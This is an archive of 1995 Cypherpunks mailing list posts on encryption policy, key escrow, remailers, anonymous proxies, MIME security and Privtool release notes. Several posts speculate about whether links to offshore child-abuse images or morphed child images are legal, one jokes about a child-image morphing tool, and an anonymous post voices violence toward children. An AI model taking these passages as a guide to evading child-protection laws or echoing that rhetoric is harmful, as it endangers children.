explicit conduct. > >If I'm reading this correctly, if I Photoshop a kids face onto the body >of the latest Playboy centerfold, I'm in violation of this proposed law? I believe there have already been prosecutions along these lines. For example, do you think a _comic book_ with child porn themes ("explicit" art, situations) would not be prosecuted as child porn? I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex act would result in a prosecution. Keith Henson, amongst others, has long suggested that a good test case will be the _morphing_ of legal images to make them look like child porn. This is not a legal list--for that there are several other fora/forums--but it is clear that the child porn laws are not necessarily aimed at the protection of specific minor children from "exploitation," as the laws apply to porn imported from countries where the age of consent is lower, apply to images of dead children (who can no longer be exploited by the images), and to "created" images of children (morphing, cut-and-paste, paintings, etc.) The laws are clearly aimed at both extinguishing the _market_ for child pornography and the _thoughts_ themselves, not at the protection of specific children. (Advocates will argue that by suppressing the production of child porn markets, future children may be protected....) The main Cypherpunks theme I can find here is this: anonymous remailers and Web proxies will be used to access offshore (or indeterminately located) sites. The Feds will likely come down very hard on any remailers or proxies found to be "trafficking" in such materials. I'm going to post to this list a recent post I made to the Cyberia list about whether pointers are the same as transfers. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 14 10:24:28 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 14 Sep 95 10:24:28 PDT Subject: Linking = Showing = Transferring? Message-ID: I posted this to the Cyberia mailing list, but think it has some implications for Cypherpunks as well. And, I'm responding to Duncan Frissell, one of our own. (I don't advise subscribing to Cyberia unless legal issues interest you and you have the time for another high-volume mailing list. Still, some bright folks there--as well as some dullards. David Friedman just joined the list. To subscribe, send a message to listserv at listserv.cc.wm.edu with the message body of subscribe cyberia-l YourNameHere.) > >To:cyberia-l at warthog.cc.wm.edu >From:tcmay at got.net (Timothy C. May) >Subject:Linking = Showing = Transferring? > > >As good a chance as any to extend my "showing = telling" point... > >At 9:32 AM 9/14/95, Duncan Frissell wrote: > >>And my favorite: "What if the student merely includes *links* to >>the above on his web page?" Of course racist images/messages are >>always and everywhere as legal as church on a Sunday although they >>may carry civil liability in limited cases -- not a problem for >>judgment-proof students. >... >>"Is the URL the page itself? --- Unanswered philosophical questions >>of the wired age." > >_Linking_ is effectively _showing_, given the point-and-click mechanics of >hypertext. This is a situation anticipated by authors (e.g. Ted Nelson), >but is now coming to the fore. > >Granted, providing a link is not the same as actually _including_ the >material the link points to, but it is very, very close. Arguably, the >same. > >(Example: I create a home page with links to many images that are child >pornography by U.S. standards. The images themselves may be initially >stored in URLs that are in countries with different standards for consent, >e.g., Denmark or Thailand. Have I violated the child porn laws? Arguably, >I am "making available" these materials, but all I have done is to provide >the _pointers_. The readers of my home page are the actual downloaders, >not me.) > >I can imagine rebuttals to this position, arguing that an author who >includes URLs to other places is doing nothing different than an author >who includes footnoted references to other works (and surely we all agree >that footnotes are not copyright infringements of any sort). > >However, look at how the Web is being used. Home pages that have >compilations of interesting things are effectively the works! It is as if >the original materials are being stored on those home pages themselves! > >There is _technological_ and _propertarian_ fix to this: controlled or >paid access to the URLs under question. The "gatekeeper" function shifts >to the actual material under question. > >But there are many new questions. > >And Duncan's specific point remains: > >-- is it a violation of pornography laws (perhaps campus rules) to have a >home page with links to URLs containing pornographic images? > >-- is it a violation of _child pornography_ laws to have a home page with >links to URLs containing child pornography images? (The URLs could be >offshore, perhaps in jurisdictions where the age of consent is much >different than in the U.S., e.g., Denmark or Thailand.) > >-- is it a violation of national security laws to have a home page with >links to URLs containing national defense secrets? (The URLs could be >offshore.) > >-- is it a violation of copyright/patent laws to have home pages with >pointers to protected material? (Songs, written works, images, inventions, >etc.) > >And so on.... > >--Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From m5 at dev.tivoli.com Thu Sep 14 10:53:17 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Thu, 14 Sep 95 10:53:17 PDT Subject: Child Porn, Morphing, and Pointers In-Reply-To: Message-ID: <9509141753.AA02480@alpha> Timothy C. May writes: > Keith Henson, amongst others, has long suggested that a good test case will > be the _morphing_ of legal images to make them look like child porn. And of course the subsequent test case on a software product that automatically morphs a .JPG of a 32-year-old model into an image of an eight-year-old. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From hallam at w3.org Thu Sep 14 10:55:48 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 14 Sep 95 10:55:48 PDT Subject: Annonymous Web proxies. Message-ID: <9509141754.AA30799@zorch.w3.org> There has been a lot of debate about setting up of annonymous Web proxies. There are many thousand already deployed. Any Web proxy which does not keep logs is effectively an annonymous Web proxy. Just download the CERN server and run it. http://www.w3.org/hypertext/WWW/Daemon/Status.html The point about monitoring such sites is an apt one. Iwork under the assumption that I am monitored because if I was a spook I would be monitoring me. Most of the discoveries of security holes arrive at my door sooner rather than later. I would have monitored the communist party for the same reason, it was one of the the most obvious place for the soviets to attempt infiltration, the other being the authoritarian establishment right. Phill From frissell at panix.com Thu Sep 14 10:57:10 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 14 Sep 95 10:57:10 PDT Subject: NSA on GAK Message-ID: <199509141755.NAA23065@panix.com> At 12:01 PM 9/14/95 -0400, Adam Shostack wrote: > > "Help me understand here. You say that serious users of >encryption don't use software distributed via network. In that case, >you would have no objection to PGP being exported, as serious users of >encryption don't use it?" Were that true, then they wouldn't be on the Internet either because the Internet runs on software distributed over the Internet. DCF From perry at piermont.com Thu Sep 14 11:03:49 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 14 Sep 95 11:03:49 PDT Subject: MIME Security Issues In-Reply-To: <199509141641.MAA11889@po_box.cig.mot.com> Message-ID: <199509141803.OAA20674@frankenstein.piermont.com> Richard Potocki writes: > Does anybody wish to express any comments regarding MIME security. You are looking for the MOSS specifications. They are fairly obvious in the way they work. Perry From fair at clock.org Thu Sep 14 11:18:54 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Thu, 14 Sep 95 11:18:54 PDT Subject: Mixmaster posting poll Message-ID: At 11:40 9/13/95, Lance Cottrell wrote: > >I seem to recall that someone on this list wrote some mail2news software, >Who was it and which standard did it follow (if either). Has anyone installed >it? Is anyone else planning to install it. I will install a gateway when I >get my T1 (in a couple of months). Rich Salz wrote mail2news, based on some ugly stuff I wrote, ages ago. Erik Fair From danisch at ira.uka.de Thu Sep 14 11:19:32 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 14 Sep 95 11:19:32 PDT Subject: Explaining Zero Knowledge to your children Message-ID: <9509141818.AA05757@elysion.iaks.ira.uka.de> There is a paper about explaining Zero Knowledge methods in simple words. It's titled "Explainig Zero Knowledge Authentication to your children" or something similar. It's said to be in the proceedings of any conference. Does anybody know where to find it? Thanks Hadmut From bdavis at thepoint.net Thu Sep 14 11:29:46 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 14 Sep 95 11:29:46 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 14 Sep 1995, Duncan Frissell wrote: > > > On Wed, 13 Sep 1995, Black Unicorn wrote: > > > But won't clients insist on proper credentials in one form or another? > > Doesn't the practicality and accountability of a centralized authority > > (or several authorities) provide the best answer to this? Who is going > > to accept my signature promising that I did indeed get a law degree and > > pass the bar? > > An educational institution can certify its own graduates --- it does > now. Competing credentialing institutions is exactly what I would be > looking for as opposed to today's coercive monoply. > > No matter how skilled, it is illegal for an unlicensed person to practice > law, medicine, or many other professions in any state. The nets weaken > these restrictions because they allow action at a distance. > That's certainly true. But what about liability insurance? That's one of the key aspects of my retention of a professional. Being cynical, and somewhat knowledgable about human error, I want to be sure there's someone to turn to if the advice/treatment/whatever turns out not only to be wrong in hindsight, but in foresight. Having taken, and passed, bar exams in three states (3 for 3 for those of you thinking I was forum shopping), I can tell you that they weren't that big of a barrier. You can flunk (over several tries) by failing to prepare at all, panicking, being an extremely poor test taker, or, well ... > Note the other effects of the nets. They make it hard to tell that you > *are* working which reduces the impact of regulations of work by > "illegal aliens." Thus if I am wandering through the South of France > while writing the 'Great American Novel' I am unlikely to get busted for > violation of work restrictions. The nets expand the number of jobs I > can do while innocently wandering the South of France. I can or will > soon be able, for example, to manage a large international corporation > from anywhere. > > DCF > > "Who actually prefers Le Massif Central to those hot and crowded southern > climes." > Just wondering about liability issues after state accrediting is dead. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From bdavis at thepoint.net Thu Sep 14 11:38:59 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 14 Sep 95 11:38:59 PDT Subject: AOL Porno In-Reply-To: Message-ID: On Thu, 14 Sep 1995, Duncan Frissell wrote: > Will the federal prosecutors and Fibbies on this list please > emphasize that the Internet was not involved in the AOL kiddie porn > case. The Internet has enough opportunities for bad publicity as > it is. > > DCF > > "Who wonders: How it is that CompuServe was able to exist from 1979 > to the arrival of Prodigy and AOL without major sex, and drugs, and > rock and roll problems?" > I would be happy to, but no member of the media has asked me. I'm available for photo ops too! :-) (for the humor impaired) I am blasting the Rimm "study" in the next issue of the Federal Lawyer. Does that count? EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From anonymous at freezone.remailer Thu Sep 14 11:43:05 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Thu, 14 Sep 95 11:43:05 PDT Subject: DD, pedaphiles, and Terrorists, oh my Message-ID: <199509141842.OAA22090@light.lightlink.com> September 13, 1995 PRESS BRIEFING BY MIKE MCCURRY [Snip] MR. MCCURRY: ... [The President]'ll be making some fairly significant news on Thursday. So he'll be very busy next week. Q News? What kind of news? Q News on what? MR. MCCURRY: You'll see next week. [Snip] Q What about Thursday -- Q Are you going? MR. MCCURRY: Half and half, I think. I'll go -- I think there are some days that look more political; I don't think it's necessary for me to be there. Q What will be the general topic on Thursday? MR. MCCURRY: On Thursday? Technology. [Snip to end] URL: http://docs.whitehouse.gov/white-house-publications/ 1995/09/1995-09-13-press-briefing-by-mike-mccurry.text ---------- Any scuttlebutt that computer security, the Internet or encryption are the "technology?" Or related to the NYT spin today on LEA-web-snooping: "We are not going to permit exciting new technology to be misused to exploit and injure children," Attorney General Janet Reno said today in announcing the arrests. The culmination of the inquiry by the Federal Bureau of Investigatlon comes at a time when the agency has needed some favorable attention to offset a string of incidents that have cast it in a negative light. Its officials have come under fire for their role in the siege at Waco, Tex., the standoff with a white separatist in Idaho and, most recently, over an attempt to cover up aspects in the Idaho incident. Or diversion from the allegations of Special Agent Whitehurst that Feeb lab rats and bosses are corrupt -- tar-morphing even Golden Boy Freeh. Pray that kid-loving Reno HRTs the abusive brats. From tms at TIS.COM Thu Sep 14 11:45:11 1995 From: tms at TIS.COM (Thomas M. Swiss) Date: Thu, 14 Sep 95 11:45:11 PDT Subject: [NOISE] Alice's Remailer site In-Reply-To: <9509141659.AA28685@toad.com> Message-ID: <199509141752.NAA12989@ziggy.tis.com> More noise. Sorry, but I can't resist: "Peter Trei" writes: >This song is called Alice's Remailer site and it's about Alice, and the >remailer site, but Alices Remailer site is not the name of the Remailer >site, it's the name of the song, and that's why I called this song Alice's >Remailer site. > > You can send anything you want through Alices Remailer site. > You can send anything you want through Alices Remailer site. > Connect right in it's around the back. > Halfway down that seventeen inch rack. > You can be anyone you want through Alice's Remailer site. (with apologies to Arlo...) You know, if one person, just one person, uses that remailer, they may think he's just paranoid, and they'll ignore him. And if two people, two people, do it -- in reply to each other--they may think they're both crooks but they won't be able to bust either of them. And if THREE people do it. Three -- Can you imagine three people loggin' in, sending mail through Alice's Remailer site and loggin' out? They may think it's an ORGANIZATION! And can you imagine FIFTY people a day? I said FIFTY people a day -- loggin' in, sending mail through Alice's Remailer site and loggin' out? And friends, they may think it's a MOVEMENT, and that's what it is: THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!-- and all you gotta do to join is to flip the bird to those traffic-sniffin' spooks out there -- With feelin' ... -Tom Swiss / tms at tis.com From patrick at Verity.COM Thu Sep 14 11:47:24 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 14 Sep 95 11:47:24 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <9509141843.AA21226@cantina.verity.com> Just a couple of comments, one on a question and one on an answer. > > >Q: Aren't LEAs worried that strong encryption will make it more > >difficult for them to catch crooks? If this is for non-cypherpunks, you should say what an LEA is. They wouldn't understand your question. (Shoot, some cypherpunks are probably going, "Huh?") > > >Q: What's this 'key escrow' thing? > > > >A: Some government agencies have been trying to figure out methods which > >simultaneously permit US citizens to use strong cryptography against > >criminal eavesdroppers, while retaining the ease with which LEAs can > >currently tap your calls. The schemes generally involve something > >mistitled 'key escrow', in which copies of cryptographic keys would be > >stored at sites accessible by LEAs. > > 'key escrow' is a code word for government access to the unencrypted > message. It is a persistent theme, dating back to the NSA's CCEP in about You probably need to say what the NSA is, and certainly have to identify CCEP. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From bdavis at thepoint.net Thu Sep 14 12:08:42 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 14 Sep 95 12:08:42 PDT Subject: NSA on GAK In-Reply-To: <199509141755.NAA23065@panix.com> Message-ID: On Thu, 14 Sep 1995, Duncan Frissell wrote: > At 12:01 PM 9/14/95 -0400, Adam Shostack wrote: > > > > "Help me understand here. You say that serious users of > >encryption don't use software distributed via network. In that case, > >you would have no objection to PGP being exported, as serious users of > >encryption don't use it?" > > Were that true, then they wouldn't be on the Internet either because the > Internet runs on software distributed over the Internet. > And that's what we call double jeopardy. Not allowed by the Constitution! > DCF > > EBD From sameer at c2.org Thu Sep 14 12:18:11 1995 From: sameer at c2.org (sameer) Date: Thu, 14 Sep 95 12:18:11 PDT Subject: An opportunity not to be missed In-Reply-To: Message-ID: <199509141913.MAA08819@infinity.c2.org> How did they get the logs? Did they have a court order? And web logs only show the site things come from, not the username things are coming from. If someone wants to set something up on c2.org, you're quite welcome to. Check out http://www.c2.org (currently under renovation.. my graphic designer is on vacation so I'm awaiting his return before we can revamp the graphics, basically.) The ecash problem, of course, is a problem. > > On Thu, 14 Sep 1995, Frank Stuart wrote: > > > Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for > > use through the remailers)? You could set up a web-page with instructions > > and a list of crimes for which there are rewards. > > Someone already tried that. The cops got a copy of the WWW logs and > started investigating everyone who'd looked at the WWW page... So at the > least you'd need a bunch of anonymous WWW proxies as well. > > There's also the problem that the current ecash systems do not provide > payee anonymity, so if you pay informers with ecash they can be traced if > the bank and payer collude. > > Mark > -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From liberty at gate.net Thu Sep 14 12:24:35 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 14 Sep 95 12:24:35 PDT Subject: Things the LEAs don't want to admit. Message-ID: <199509141920.PAA55734@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Andrew Loewenstern writes: >Encryption prevents 'fishing expeditions' and >unauthorized monitoring; this is what the LEAs don't want to admit. AMEN, Andrew. Another thing the LEAs don't want to admit is the incredible (cost and otherwise) effectiveness of the "Honey Trap" (SEX!) when used by (or against) them. Cash isn't the only way to recruit another Aldrich Ames(sp?), and sex is a lot easier to launder. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMFh3P21lp8bpvW01AQGiawP/RbB0VL2wQ4zp712EEHt3IKz+HQpM8rjY KXXMMTdMpryBX2pWZRxm82ewYwiSwI2U+Ij67jQ+9Ev2/S1WgVCiV+se05oZ8n85 QkWI182G+Bk4JJ46/LwBDFos8gp9WRYCoRVFgA5SmV92r05MpPnrtzNUCG31D8vd FsB+JDwnZQ8= =rUVo -----END PGP SIGNATURE----- Regards, Jim Ray "When making public-policy decisions for the government, I think one should ask oneself which technologies would best strengthen the hand of a police state. Then, do not allow the government to deploy those technologies." -- Phillip Zimmermann, talking to himself. (Congress sure-as-hell wasn't paying attention!) ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From koontz at MasPar.COM Thu Sep 14 12:32:24 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Thu, 14 Sep 95 12:32:24 PDT Subject: GAK Message-ID: <9509141935.AA09315@argosy.MasPar.COM> >So would an FBI camcorder in every room of every house. >The question is where to draw the line, and I'd rather >let the lines draw themselves, as opposed to having >citizens be compelled to draw them. The telephone >system, Mr. Freeh's preferred analog, is inherently >susceptible to tapping, but what if it were not, and >every telephone were required to be equipped with >a government tap switch, subuect to warrant, of course? While not every telephone, every telephone switch is required to be tap capable - The Digital Telephony Act. Note there is provision for the government to pay costs for Telcos to make their phones tappable - as yet unfunded by Congress. The rights of The People have clearly collided with the interests of Law Enforcement. Guess who Congress likes better? From martin at mrrl.lut.ac.uk Thu Sep 14 12:44:21 1995 From: martin at mrrl.lut.ac.uk (Martin Hamilton) Date: Thu, 14 Sep 95 12:44:21 PDT Subject: MOSS [IETF privacy-enhanced mail, modified for MIME] now available In-Reply-To: <9509132335.AA05053@sulphur.osf.org> Message-ID: <199509141944.UAA22502@gizmo.lut.ac.uk> Rich Salz writes: | >From pem-dev-request at neptune.tis.com Wed Sep 13 19:27:35 1995 | Message-Id: <9509132011.AA19261 at tis.com> | Reply-To: James M Galvin | To: "MOSS.Announce.List":;, tis.com at TIS.COM | Subject: ANNOUNCE: TIS/MOSS Version 7.1 [...] | 3 | Q: How does MOSS compare to PGP and PEM? | | PGP can provide the same services but since it is not integrated with | MIME the interpretation of the protected content is necessarily user | controlled. Note, however, that MIME can carry a PGP object. Just wondering - is anyone working on a profile for PGP under MOSS and/or the multipart/signed and multipart/encrypted body parts ? Whether or not they are, it would be useful to have a de-facto standard for the use of PGP with current MIME implementations. I recall there was a draft RFC by Nathaniel Borenstein which dealt with this, but it was withdrawn to leave the way clear for MOSS ? Why bother ? Well, there are lots of mailers out there with "some" MIME support - enough for launching a helper application to read and perhaps compose (say) application/pgp, but not nearly enough to handle MOSS. I'm thinking about commercial offerings for the likes of MacOS, DOS, and Windows in particular. It seems like a really neat hack to use the MIME support to bring PGP in by stealth, but perhaps most of the implementations Out There are too crippled ? Over to you... :-) Martin From gnu at toad.com Thu Sep 14 13:18:14 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 14 Sep 95 13:18:14 PDT Subject: Corrections to "Ron Plesser's take on NIST GAK" Message-ID: <9509142018.AA04536@toad.com> There were a few sentences truncated in what I posted yesterday, due to mistakes on my part. Here's the corrections. John ... The Administration policy for 40-bit-key encryption will continue as-is, and no keys will have to be escrowed for such systems. Mr. Nelson said that the government's main concern is that strong encryption products not be available in the mass market. ... bi-lateral agreements with friendly nations. In a presentation, Bob Holleyman of the Business Software Alliance criticized the Administration's failure to "liberalize export controls on generally available software employing non-key escrow encryption." Also, he stated that the Administration's proposal and the draft criteria "continue to reflect a misunderstanding of the market place and, if implemented in anything like their current form, will prevent key escrow encryption from ever being commercially adopted." Mr. Holleyman recommended a number of features for a marketable system, including a variety of encryption algorithms using at least 64-bit keys and user specification of a key holder. From unicorn at polaris.mindport.net Thu Sep 14 13:58:33 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 14 Sep 95 13:58:33 PDT Subject: cryptography eliminates lawyers? In-Reply-To: Message-ID: On Thu, 14 Sep 1995, Dar Scott wrote: > Black Unicorn wrote, [...] > >> Perhaps, I could have use the phrases "non-coercion-based" licensing and > >> "coercion-based" licensing, but I am not comfortable with these--trade > >> licensing invokes too violent of an image. > > > >I think this construction is still flawed. I will remain by my position > >that licensing is useful when not used to collect taxes or > >otherwise overregulate. I also hold that the distinctions you make > >between licensing and certification are without functional difference in > >effect and are deceptive in that they suggest a significant difference in > >effect or purpose where there is none. > > > The difference in effect is in emergent market optimization. The > difference in purpose is ethical. > > I have learned that you--and perhaps others--do not see an important > difference in these two styles of influencing behavior. I see a major > difference and in thinking the difference was obvious was slow in > understanding your position. I think I understand your position now. To me there is little difference in how one is persuaded against one's will. Certainly I dislike violence, but some of the "persuasive" methods in a market economy sicken me just as much as force might. In any event, your construction makes sense to me, even if I do not find it useful myself. > Great. You're already enjoying breakfast and I still have to go to bed. I hate time zones. > Dar > > =========================================================== > Dar Scott Home phone: +1 505 299 9497 > > Dar Scott Consulting Voice: +1 505 299 5790 > 8637 Horacio Place NE Email: darscott at aol.com > Albuquerque, NM 87111 dsc at swcp.com > Fax: +1 505 898 6525 > http://www.swcp.com/~correspo/DSC/DarScott.html > =========================================================== > > > From futplex at pseudonym.com Thu Sep 14 14:01:27 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 14 Sep 95 14:01:27 PDT Subject: Crimestoppers anon tip mailbox In-Reply-To: <199509141913.MAA08819@infinity.c2.org> Message-ID: <199509142101.RAA23535@ducie.cs.umass.edu> Mark writes: # Someone already tried that. The cops got a copy of the WWW logs and # started investigating everyone who'd looked at the WWW page... sameer writes: [re: the kidnapped-child info Web page] > How did they get the logs? Did they have a court order? No. The owner of the Web page voluntarily offered the logs when asked by the local police. -Futplex From joseph at genome.wi.mit.edu Thu Sep 14 14:55:32 1995 From: joseph at genome.wi.mit.edu (Joseph Sokol-Margolis) Date: Thu, 14 Sep 95 14:55:32 PDT Subject: Linking = Showing = Transferring? Message-ID: >>And Duncan's specific point remains: >> >>-- is it a violation of pornography laws (perhaps campus rules) to have a >>home page with links to URLs containing pornographic images? >> >>-- is it a violation of _child pornography_ laws to have a home page with >>links to URLs containing child pornography images? (The URLs could be >>offshore, perhaps in jurisdictions where the age of consent is much >>different than in the U.S., e.g., Denmark or Thailand.) >> >>-- is it a violation of national security laws to have a home page with >>links to URLs containing national defense secrets? (The URLs could be >>offshore.) >> >>-- is it a violation of copyright/patent laws to have home pages with >>pointers to protected material? (Songs, written works, images, inventions, >>etc.) >> >>And so on.... Here's my question, and a thought to ponder: If it is/becomes illegal to have links on a homepage to pornography because it is ruled as the same as having the pornography there; then can you have links to pages with links (the same as having it) to pornography? This repeats, so would it be legal to links at all? -------------------------------------------------------------------------------- Joseph Sokol-Margolis joseph at genome.wi.mit.edu Assistant Systems Administrator seph at mit.edu Whitehead Institute/MIT Center for Genome Research phone: (617) 252-1922 One Kendall Sq. Bldg. 300 fax: (617) 252-1902 Cambridge, MA 02139-1561 ----------------------http://www-genome.wi.mit.edu/~joseph/----------------- ---- From loki at obscura.com Thu Sep 14 14:58:20 1995 From: loki at obscura.com (Lance Cottrell) Date: Thu, 14 Sep 95 14:58:20 PDT Subject: Mixmaster status changing Message-ID: <199509142157.OAA10304@obscura.com> -----BEGIN PGP SIGNED MESSAGE----- I recently promised to release the next version of Mixmaster (V 2.0.2) within 48 hours. The situation has changed. The release of the next version of Mixmaster will be indefinitely delayed. There has been an offer to purchase and commercially develop Mixmaster. This will hasten the development of Mixmaster for other platforms (e.g. Dos, Windows Macintosh), and bring significant improvements to the interface, but I will not compromise on the level of security provided by Mixmaster. Free client software will continue to be available. This could be the big breakthrough for remailers, finally thrusting them out of the hobbyist's closet into the corporate world. We have all known that remailers would not become widely used by the rest of the word until they were easy to use. Many corporations also fear freeware because of its unknown provenance and its lack of support. I apologize for the delay, but I think that the wait will be worth it. -Lance M. Cottrell -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFimnfPzr81BVjMVAQEfpQgAktbVCj3f39sXtTHPL/H2qh6xJuSvozv1 YXai2/NOh9Y5+qTYJS0R1u8+xSdzQlwfvbdteeXtqK0Ba9QBa2tIPwo0jVVvnano eyFSic0+FoPg33geVGO7Opn+RjOIsvz1MXD41mHxB7p9tRClnEuenvTKqjWovHwU wQX8mDRsz14cqN1x4YN5MtiFZwz+FgqD8r3O/u6eAT032X0KirfPkxwyIFbfOqz4 crxR/P6KJ7GZzxfyYjoAjOSSan1VkAcp11HzmFU37PA/LB8kbKyYxCrfg+grQu+x cDMGvb/xg6cwD+D/D7RTUT756m4TDpbgzaNy9SIQTAnbAAspZXZ1mA== =GIrJ -----END PGP SIGNATURE----- -- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From mark at unicorn.com Thu Sep 14 15:00:55 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Thu, 14 Sep 95 15:00:55 PDT Subject: Privtool 0.85 Released Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hi, I've just released a new version of Privtool, with a large number of bugfixes and new features. It's available from ftp.c2.org as /pub/privtool/privtool-0.85.tar.gz, and in Europe from ftp.dsi.unimi.it in /pub/security/crypt/code, or from ftp.ox.ac.uk in /pub/crypt/pgp/utils. DUE TO US ITAR REGULATIONS, IF YOU ARE OUTSIDE THE US YOU SHOULD DOWNLOAD PRIVTOOL FROM A NON-US SITE. Dumb, but true... Documentation is also available on the WWW at http://www.c2.org/~mark/privtool/privtool.html. Mark Privtool Beta Release @(#)README.1ST 1.34 9/12/95 ----------------------------------------------------- Privtool ("Privacy Tool") is intended to be a PGP-aware replacement for the standard Sun Workstation mailtool program, with a similar user interface and automagick support for PGP-signing and PGP-encryption. Just to make things clear, I have written this program from scratch, it is *not* a modified mailtool (and I'd hope that the Sun program code is much cleaner than mine 8-) !). When the program starts up, it displays a list of messages in your mailbox, along with flags to indicate whether messages are signed or encrypted, and if they have had their signatures verified or have been decrypted. When you double click on a message, it will be decrypted (requesting your passphrase if neccesary), and/or will have the signature checked, and the decrypted message will be displayed in the top part of the display window, with signature information in the bottom part. The mail header is not displayed, but can be read by pressing the 'Header' button to display the header window. In addition, the program has support for encrypted mailing list feeds, and if the decrypted message includes another standard-format message it will replace the original message and be fed back into the display processing chain. When composing a message or replying to one, the compose window has several check-boxes, including one for signature, and one for encryption. If these are selected, then the message will be automatically encrypted and/or signed (requesting your passphrase when neccesary) before it is sent. You may also select a 'Remail' box, which will use the Mixmaster anonymous remailer client program to send the message through one or more remailers. Being an Beta release, there are a number of bugs and nonfeatures : Known Bugs : When you save changes to the mail file, it throws away the signature verification and decrypted messages, so that the next time you view a message it has to be verified or decrypted again. Privtool requires that the /usr/spool/mail directory is world-writable. Some versions of Linux are set up to have mail programs setgid mail, and have write access only to mail and root, causing hangs when saving changes. This will be fixed in the next release. Header window is not updated if left open. Date parsing on Linux is not quite correct. Problem with compose window layout if using Bcc: or extra header lines. Crashes if you tab from the Cc: field to the message body. Known Nonfeatures : Currently if you send encrypted mail to multiple recipients, all must have valid encrpytion keys otherwise you will have to send the message decrypted. Also, the message will be sent encrypted to all users, not just the one who is receiving each copy. Only one display window. Code should be more modular to assist with ports to Xt, Motif, Mac, Windows, etc. Not very well documented ! Encrypted messages are saved to mail files in encrypted form. There is currently no option to save messages in decrypted form. No support for anonymous return addresses. Not very well tested on Solaris 2.x, or Linux. Changes for 0.85: Support for Reply-To: addresses in message headers. If you have PGP Tools, then the passphrase is now stored in MD5 form rather than as ASCII text. This will make it harder to steal your passphrase if you're running on a multi-user machine (which you shouldn't be, but many of us are). Improved documentation. 'New mail' indicator in icon now goes away if you open the window and close it again without reading any messages. Support for multiple compose windows - no more pressing 'Reply' and screaming because you deleted the message you were editing ! Query on exit if any compose windows are open. Show busy cursor for time-consuming operations. Kill-by-name and Kill-by-subject now work correctly. 'Add Key' button now works. Optionally beep on bad signature. Added various changes from Anders Baekgaard (baekgrd at ibm.net), we can how use a more normal icon if preferred, pass arguments on the command line, specify the font to use, support the 'showto' option, allow X-resources to be set up, fix a bug in Linux which showed the message list as a black box, cleaned up some warnings from x.c, support bcc:, and have an option for a simplified, smaller, display layout for machines with small screens. Fixed some memory leaks in deliver_proc (). Anders finally got the scrollbar to go to the right place when opening mail files ! Yay !!!! Fixed bad arguments that were being passed to bzero() in pgplib.c and potentially causing random memory overwrites. Fix for Linux icon corruption from A J Teeder (ajteeder at dra.hmg.gb). Added 'resend' to resend a message that failed the first time. Added Linux-specific Makefile, now that I have my own Linux box to test it on. Fixed SEGV when delivering messages (with some .mailrc files), caused by a bug in the alias-handling code. Privtool can be compiled to either use PGP Tools, or to fork off a copy of PGP whenever it is needed. There are also a number of different security level options for the passphrase, varying from 'read it from PGPPASS and keep it in memory' to 'request it every time and delete it as soon as possible', via 'request it when neccesary and delete 